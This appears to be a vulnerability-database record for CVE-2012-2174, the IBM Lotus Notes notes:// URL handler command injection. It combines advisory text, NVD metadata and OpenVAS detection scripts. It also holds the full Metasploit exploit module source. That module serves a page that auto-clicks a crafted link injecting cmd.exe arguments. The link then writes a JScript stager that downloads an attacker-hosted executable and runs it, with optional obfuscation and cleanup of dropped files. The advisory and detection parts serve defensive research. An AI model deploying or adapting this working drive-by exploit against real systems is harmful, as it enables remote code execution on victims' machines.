Background
Lotus Notes is the client for Lotus Domino servers.
Problem
Lotus Notes 8.5.3 (and earlier) is vulnerable to remote code execution when handling a specially crafted URL. A remote attacker can pass the -RPARAMS command line argument to notes.exe, which then launches rcplauncher.exe. Supplying the java -vm option as well allows the attacker to execute arbitrary code in the context of the notes.exe process.
Limitations
This exploit has been tested against IBM Lotus Notes 8.5.3 FP1 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn).
The user must open the HTML page using Internet Explorer 8 or 9 on the target.
The smbclient binary must be available to the script.
The target must be able to access the specified SMB share anonymously.
A valid login and password with write permission for the specified SMB share are required.
Platforms
Windows
{"type": "saint", "published": "2012-09-07T00:00:00", "reporter": "SAINT Corporation", "bulletinFamily": "exploit", "id": "SAINT:4C6CD66A579269BBC6A033367A5ED1B9", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-2174"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803214", "OPENVAS:803214"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/NOTES_HANDLER_CMDINJECT", "MSF:AUXILIARY/SQLI/ORACLE/DBMS_CDC_IPUBLISH"]}, {"type": "exploitdb", "idList": ["EDB-ID:23650"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12529", "SECURITYVULNS:DOC:28414"]}, {"type": "zdi", "idList": ["ZDI-12-154"]}, {"type": "seebug", "idList": ["SSV:60226"]}, {"type": "nessus", "idList": ["LOTUS_NOTES_8_5_3_FP2.NASL"]}, {"type": "saint", "idList": ["SAINT:C627294DBD8C18A68C09D1F058347049", "SAINT:3F9E88E38CBA8EE7DA7355EC30D530D3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119058"]}, {"type": "d2", "idList": ["D2SEC_NOTESURL"]}], "modified": "2019-05-29T19:19:28", "rev": 2}, "score": {"value": 9.8, "vector": "NONE", "modified": "2019-05-29T19:19:28", "rev": 2}, "vulnersScore": 9.8}, "edition": 2, "viewCount": 6, "cvelist": ["CVE-2012-2174"], "references": [], "lastseen": "2019-05-29T19:19:28", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_url_handler", "modified": "2012-09-07T00:00:00", "title": "IBM Lotus Notes URL Handler Command Execution", "description": "Added: 09/07/2012 \nCVE: [CVE-2012-2174](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2174>) \nBID: [54070](<http://www.securityfocus.com/bid/54070>) \nOSVDB: [83063](<http://www.osvdb.org/83063>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nLotus Notes 8.5.3 (and earlier) is vulnerable to remote code execution when handling a specially crafted URL. 
A remote attacker can pass the `-RPARAMS` command line argument to `notes.exe`, which then launches `rpclauncher.exe`. Also supplying the java `-vm` command allows the attacker to execute arbitrary code in the context of the `notes.exe` process. \n\n### Resolution\n\nApply the updates as described in the [IBM Security Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21598348>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-154/> \n\n\n### Limitations\n\nThis exploit has been tested against IBM Lotus Notes 8.5.3 FP1 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe user must open the HTML page using Internet Explorer 8 or 9 on the target. \n\nThe binary 'smbclient' must be available to the script. \n\nThe target must be able to access the specified SMB share anonymously. \n\nA valid login and password with write permission for the specified SMB share are required. \n\n### Platforms\n\nWindows \n \n\n", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:59:48", "description": "The URL handler in IBM Lotus Notes 8.x before 8.5.3 FP2 allows remote attackers to execute arbitrary code via a crafted notes:// URL.", "edition": 4, "cvss3": {}, "published": "2012-06-20T10:27:00", "title": "CVE-2012-2174", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2174"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:ibm:lotus_notes:8.5.1", "cpe:/a:ibm:lotus_notes:8.5.2.3", "cpe:/a:ibm:lotus_notes:8.5.0.1", "cpe:/a:ibm:lotus_notes:8.0.2.6", "cpe:/a:ibm:lotus_notes:8.0.2.0", "cpe:/a:ibm:lotus_notes:8.5", "cpe:/a:ibm:lotus_notes:8.5.1.4", "cpe:/a:ibm:lotus_notes:8.5.2.2", "cpe:/a:ibm:lotus_notes:8.0", "cpe:/a:ibm:lotus_notes:8.5.2.1", "cpe:/a:ibm:lotus_notes:8.5.1.3", "cpe:/a:ibm:lotus_notes:8.0.2.3", "cpe:/a:ibm:lotus_notes:8.5.3", "cpe:/a:ibm:lotus_notes:8.0.2.4", "cpe:/a:ibm:lotus_notes:8.5.3.1", "cpe:/a:ibm:lotus_notes:8.0.2", "cpe:/a:ibm:lotus_notes:8.5.2.0", "cpe:/a:ibm:lotus_notes:8.0.2.1", "cpe:/a:ibm:lotus_notes:8.5.1.1", "cpe:/a:ibm:lotus_notes:8.5.1.5", "cpe:/a:ibm:lotus_notes:8.0.0", "cpe:/a:ibm:lotus_notes:8.0.1", "cpe:/a:ibm:lotus_notes:8.5.1.0", "cpe:/a:ibm:lotus_notes:8.5.1.2", "cpe:/a:ibm:lotus_notes:8.5.0.0", "cpe:/a:ibm:lotus_notes:8.0.2.5", "cpe:/a:ibm:lotus_notes:8.0.2.2"], "id": "CVE-2012-2174", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2174", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:ibm:lotus_notes:8.5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:11:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2174"], "description": "This host is installed with IBM Lotus Notes and is prone to remote\n code execution vulnerability.", "modified": "2017-05-05T00:00:00", "published": "2013-01-23T00:00:00", "id": "OPENVAS:803214", "href": "http://plugins.openvas.org/nasl.php?oid=803214", "type": "openvas", "title": "IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 
gb_ibm_lotus_notes_url_cmd_inj_rce_vuln_win.nasl 6074 2017-05-05 09:03:14Z teissa $\n#\n# IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code via a\n malicious URLs.\n Impact Level: System/Application\";\n\ntag_affected = \"IBM Lotus Notes Version 8.x before 8.5.3 FP2 on windows\";\ntag_insight = \"An error exists within the URL handler which allows attackers to execute\n commands on the target.\";\ntag_solution = \"Upgrade to IBM Lotus Notes 8.5.3 FP2 or later,\n For updates refer to http://www-304.ibm.com/support/docview.wss?uid=swg21598348\";\ntag_summary = \"This host is installed with IBM Lotus Notes and is prone to remote\n code execution vulnerability.\";\n\nif(description)\n{\n script_id(803214);\n script_version(\"$Revision: 6074 $\");\n script_cve_id(\"CVE-2012-2174\");\n script_bugtraq_id(54070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", 
value:\"$Date: 2017-05-05 11:03:14 +0200 (Fri, 05 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-23 11:08:14 +0530 (Wed, 23 Jan 2013)\");\n script_name(\"IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49601\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027427\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/75320\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/23650\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-12-154\");\n script_xref(name : \"URL\" , value : \"http://www-304.ibm.com/support/docview.wss?uid=swg21598348\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.com/files/119058/IBM-Lotus-Notes-Client-URL-Handler-Command-Injection.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_ibm_lotus_notes_detect_win.nasl\");\n script_require_keys(\"IBM/LotusNotes/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nlotusVer = \"\";\n\n## Get for IBM Lotus Notes Version\nlotusVer = get_kb_item(\"IBM/LotusNotes/Win/Ver\");\nif(!lotusVer){\n exit(0);\n}\n\n## Check for IBM Lotus Notes Version 8.x < 8.5.3 FP2 [8.5.32.12184]\nif(lotusVer =~ \"^8\" &&\n version_is_less(version:lotusVer, test_version:\"8.5.32.12184\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2174"], "description": "This host is installed with IBM Lotus Notes and is prone to remote\n code execution vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2013-01-23T00:00:00", "id": "OPENVAS:1361412562310803214", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803214", "type": "openvas", "title": "IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_lotus_notes_url_cmd_inj_rce_vuln_win.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803214\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2012-2174\");\n script_bugtraq_id(54070);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-23 11:08:14 +0530 (Wed, 23 Jan 2013)\");\n script_name(\"IBM Lotus Notes URL Command Injection RCE Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49601\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1027427\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/75320\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/23650\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-154\");\n script_xref(name:\"URL\", value:\"http://www-304.ibm.com/support/docview.wss?uid=swg21598348\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/119058/IBM-Lotus-Notes-Client-URL-Handler-Command-Injection.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_ibm_lotus_notes_detect_win.nasl\");\n script_mandatory_keys(\"IBM/LotusNotes/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code via a\n malicious URLs.\");\n 
script_tag(name:\"affected\", value:\"IBM Lotus Notes Version 8.x before 8.5.3 FP2 on windows\");\n script_tag(name:\"insight\", value:\"An error exists within the URL handler which allows attackers to execute\n commands on the target.\");\n script_tag(name:\"solution\", value:\"Upgrade to IBM Lotus Notes 8.5.3 FP2 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with IBM Lotus Notes and is prone to remote\n code execution vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nlotusVer = get_kb_item(\"IBM/LotusNotes/Win/Ver\");\nif(!lotusVer){\n exit(0);\n}\n\nif(lotusVer =~ \"^8\" &&\n version_is_less(version:lotusVer, test_version:\"8.5.32.12184\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "d2": [{"lastseen": "2019-05-29T19:19:04", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "description": "**Name**| d2sec_notesurl \n---|--- \n**CVE**| CVE-2012-2174 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| IBM Lotus Notes URL Command Injection Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 2, "modified": "2012-06-20T10:27:00", "published": "2012-06-20T10:27:00", "id": "D2SEC_NOTESURL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_notesurl", "title": "DSquare Exploit Pack: D2SEC_NOTESURL", "type": "d2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "description": "Added: 09/07/2012 \nCVE: [CVE-2012-2174](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2174>) \nBID: [54070](<http://www.securityfocus.com/bid/54070>) \nOSVDB: 
[83063](<http://www.osvdb.org/83063>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nLotus Notes 8.5.3 (and earlier) is vulnerable to remote code execution when handling a specially crafted URL. A remote attacker can pass the `-RPARAMS` command line argument to `notes.exe`, which then launches `rpclauncher.exe`. Also supplying the java `-vm` command allows the attacker to execute arbitrary code in the context of the `notes.exe` process. \n\n### Resolution\n\nApply the updates as described in the [IBM Security Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21598348>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-154/> \n\n\n### Limitations\n\nThis exploit has been tested against IBM Lotus Notes 8.5.3 FP1 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe user must open the HTML page using Internet Explorer 8 or 9 on the target. \n\nThe binary 'smbclient' must be available to the script. \n\nThe target must be able to access the specified SMB share anonymously. \n\nA valid login and password with write permission for the specified SMB share are required. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-09-07T00:00:00", "published": "2012-09-07T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_url_handler", "id": "SAINT:3F9E88E38CBA8EE7DA7355EC30D530D3", "type": "saint", "title": "IBM Lotus Notes URL Handler Command Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "description": "Added: 09/07/2012 \nCVE: [CVE-2012-2174](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2174>) \nBID: [54070](<http://www.securityfocus.com/bid/54070>) \nOSVDB: [83063](<http://www.osvdb.org/83063>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nLotus Notes 8.5.3 (and earlier) is vulnerable to remote code execution when handling a specially crafted URL. A remote attacker can pass the `-RPARAMS` command line argument to `notes.exe`, which then launches `rpclauncher.exe`. Also supplying the java `-vm` command allows the attacker to execute arbitrary code in the context of the `notes.exe` process. \n\n### Resolution\n\nApply the updates as described in the [IBM Security Bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg21598348>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-154/> \n\n\n### Limitations\n\nThis exploit has been tested against IBM Lotus Notes 8.5.3 FP1 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nThe user must open the HTML page using Internet Explorer 8 or 9 on the target. \n\nThe binary 'smbclient' must be available to the script. \n\nThe target must be able to access the specified SMB share anonymously. \n\nA valid login and password with write permission for the specified SMB share are required. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-09-07T00:00:00", "published": "2012-09-07T00:00:00", "id": "SAINT:C627294DBD8C18A68C09D1F058347049", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_url_handler", "title": "IBM Lotus Notes URL Handler Command Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:04", "description": "", "published": "2012-12-24T00:00:00", "type": "packetstorm", "title": "IBM Lotus Notes Client URL Handler Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "modified": "2012-12-24T00:00:00", "id": "PACKETSTORM:119058", "href": "https://packetstormsecurity.com/files/119058/IBM-Lotus-Notes-Client-URL-Handler-Command-Injection.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"IBM Lotus Notes Client URL Handler Command Injection\", \n'Description' => %q{ \nThis modules exploits a command injection vulnerability in the URL handler for \nfor the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with \nan specially crafted notes:// URL to execute arbitrary commands with also arbitrary \narguments. This module has been tested successfully on Windows XP SP3 with IE8, \nGoogle Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Moritz Jodeit', # Vulnerability discovery \n'Sean de Regge', # Vulnerability analysis \n'juan vazquez' # Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2012-2174' ], \n[ 'OSVDB', '83063' ], \n[ 'BID', '54070' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ], \n[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ], \n[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ] \n], \n'Payload' => \n{ \n'Space' => 2048, \n'StackAdjustment' => -3500 \n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => \"none\", \n'InitialAutoRunScript' => 'migrate -k -f' \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jun 18 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \nend \n \ndef exploit \n@exe_name = rand_text_alpha(2) + \".exe\" \n@stage_name = rand_text_alpha(2) + \".js\" \nsuper \nend \n \ndef on_new_session(session) \nif session.type == \"meterpreter\" \nsession.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\") \nend \n \n@dropped_files.delete_if do |file| \nwin_file = file.gsub(\"/\", \"\\\\\\\\\") \nif session.type == \"meterpreter\" \nbegin \nwintemp = session.fs.file.expand_path(\"%TEMP%\") \nwin_file = \"#{wintemp}\\\\#{win_file}\" \n# Meterpreter should do this automatically as part of \n# fs.file.rm(). Until that has been implemented, remove the \n# read-only flag with a command. 
\nsession.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|) \nsession.fs.file.rm(win_file) \nprint_good(\"Deleted #{file}\") \ntrue \nrescue ::Rex::Post::Meterpreter::RequestError \nprint_error(\"Failed to delete #{win_file}\") \nfalse \nend \n \nend \nend \n \nend \n \ndef on_request_uri(cli, request) \n \nif request.uri =~ /\\.exe$/ \nreturn if ((p=regenerate_payload(cli))==nil) \nregister_file_for_cleanup(\"#{@stage_name}\") unless @dropped_files and @dropped_files.include?(\"#{@stage_name}\") \nregister_file_for_cleanup(\"#{@exe_name}\") unless @dropped_files and @dropped_files.include?(\"#{@exe_name}\") \ndata = generate_payload_exe({:code=>p.encoded}) \nprint_status(\"Sending payload\") \nsend_response(cli, data, {'Content-Type'=>'application/octet-stream'}) \nreturn \nend \n \nmy_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nif datastore['SSL'] \nschema = \"https\" \nelse \nschema = \"http\" \nend \nuri = \"#{schema}://#{my_host}\" \nuri << \":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe\" \n \nscript = \"var w=new ActiveXObject('wscript.shell');\" \nscript << \"w.CurrentDirectory=w.ExpandEnvironmentStrings('\\\\%TEMP\\\\%');\" \nscript << \"var x=new ActiveXObject('Microsoft.XMLHTTP');\" \nscript << \"x.open('GET','#{uri}', false);\" \nscript << \"x.send();\" \nscript << \"var s=new ActiveXObject('ADODB.Stream');\" \nscript << \"s.Mode=3;\" \nscript << \"s.Type=1;\" \nscript << \"s.Open();\" \nscript << \"s.Write(x.responseBody);\" \nscript << \"s.SaveToFile('#{@exe_name}',2);\" \nscript << \"w.Run('#{@exe_name}');\" \n \nvmargs = \"/q /s /c echo #{script} > %TEMP%\\\\\\\\#{@stage_name}& start cscript %TEMP%\\\\\\\\#{@stage_name}& REM\" \n \nlink_id = rand_text_alpha(5 + rand(5)) \n \njs_click_link = %Q| \nfunction clickLink(link) { \nvar cancelled = false; \n \nif (document.createEvent) { \nvar event = document.createEvent(\"MouseEvents\"); 
\nevent.initMouseEvent(\"click\", true, true, window, \n0, 0, 0, 0, 0, \nfalse, false, false, false, \n0, null); \ncancelled = !link.dispatchEvent(event); \n} \nelse if (link.fireEvent) { \ncancelled = !link.fireEvent(\"onclick\"); \n} \n \nif (!cancelled) { \nwindow.location = link.href; \n} \n} \n| \n \nif datastore['OBFUSCATE'] \njs_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link) \njs_click_link.obfuscate \njs_click_link_fn = js_click_link.sym('clickLink') \nelse \njs_click_link_fn = 'clickLink' \nend \n \n \nhtml = <<-EOS \n<html> \n<head> \n<script> \n#{js_click_link} \n</script> \n</head> \n<body onload=\"#{js_click_link_fn}(document.getElementById('#{link_id}'));\"> \n<a id=\"#{link_id}\" href=\"notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\\\windows\\\\system32\\\\cmd.exe -vmargs #{vmargs}\"></a> \n</body> \n</html> \nEOS \n \nprint_status(\"Sending html\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \n \nend \n \nend`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119058/notes_handler_cmdinject.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T21:28:44", "description": "IBM Lotus Notes Client URL Handler Command Injection. CVE-2012-2174. Remote exploit for windows platform", "published": "2012-12-25T00:00:00", "type": "exploitdb", "title": "IBM Lotus Notes Client URL Handler Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2174"], "modified": "2012-12-25T00:00:00", "id": "EDB-ID:23650", "href": "https://www.exploit-db.com/exploits/23650/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\tinclude Msf::Exploit::FileDropper\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"IBM Lotus Notes Client URL Handler Command Injection\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis modules exploits a command injection vulnerability in the URL handler for\r\n\t\t\t\tfor the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\r\n\t\t\t\tan specially crafted notes:// URL to execute arbitrary commands with also arbitrary\r\n\t\t\t\targuments. This module has been tested successfully on Windows XP SP3 with IE8,\r\n\t\t\t\tGoogle Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Moritz Jodeit', # Vulnerability 